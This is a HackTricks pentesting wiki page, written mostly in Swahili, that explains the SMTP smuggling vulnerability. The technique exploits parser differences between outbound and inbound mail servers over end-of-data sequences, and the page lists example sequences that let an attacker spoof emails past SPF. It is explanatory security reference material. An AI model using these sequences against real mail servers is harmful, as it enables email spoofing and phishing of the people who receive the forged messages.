hacktricks/network-services-pentesting/pentesting-smtp/smtp-smuggling.md

62 lines
4.6 KiB
Markdown
Raw Normal View History

# SMTP Smuggling
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Aina hii ya udhaifu iligunduliwa [**awali katika chapisho hili**](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/) ambapo inaelezwa kuwa inawezekana **kutumia tofauti katika jinsi itifaki ya SMTP inavyotafsiriwa** wakati wa kumaliza barua pepe, ikiruhusu mshambuliaji kusafirisha barua pepe zaidi ndani ya mwili wa ile halali, ikiruhusu kuiga watumiaji wengine wa kikoa kilichohusika (kama admin@outlook.com) kwa kupita kinga kama SPF.
### Why
Hii ni kwa sababu katika itifaki ya SMTP, **data ya ujumbe** inayopaswa kutumwa katika barua pepe inasimamiwa na mtumiaji (mshambuliaji) ambaye anaweza kutuma data iliyoundwa kwa makusudi ikitumia tofauti katika parsers ambazo zitasafirisha barua pepe za ziada kwa mpokeaji. Angalia mfano huu ulioonyeshwa kutoka kwa chapisho la awali:
<figure><img src="../../.gitbook/assets/image (8) (1).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
### How
Ili kutumia udhaifu huu, mshambuliaji anahitaji kutuma data ambayo **seva ya SMPT ya Kutoka inadhani ni barua pepe 1 tu lakini seva ya SMTP ya Kuingia inadhani kuna barua pepe kadhaa**.
Watafiti waligundua kuwa **seva za Kuingia zinachukulia wahusika tofauti kama mwisho wa data** ya ujumbe wa barua pepe ambayo seva za Kutoka hazichukui.\
Kwa mfano, mwisho wa kawaida wa data ni `\r\n.\r\n`. Lakini ikiwa seva ya SMTP ya Kuingia pia inasaidia `\n.\n`, mshambuliaji anaweza kuongeza **data hiyo katika barua pepe yake na kuanza kuashiria amri za SMTP** za mpya ili kuisafirisha kama ilivyoonyeshwa katika picha ya awali.
Kwa kweli, hii inaweza kufanya kazi tu ikiwa **seva ya SMTP ya Kutoka haitibu data hii** kama mwisho wa data ya ujumbe, kwa sababu katika hali hiyo itakuwaona barua pepe 2 badala ya 1 tu, hivyo mwishowe hii ndiyo desynchronization inayotumiwa katika udhaifu huu.
Data ya uwezekano wa desynchronization:
* `\n.\n`
* `\n.\r\n`
Pia kumbuka kuwa SPF inapita kwa sababu ikiwa unapasua barua pepe kutoka `admin@outlook.com` kutoka kwa barua pepe ya `user@outlook.com`, **mjumbe bado ni `outlook.com`.**
## **References**
* [https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}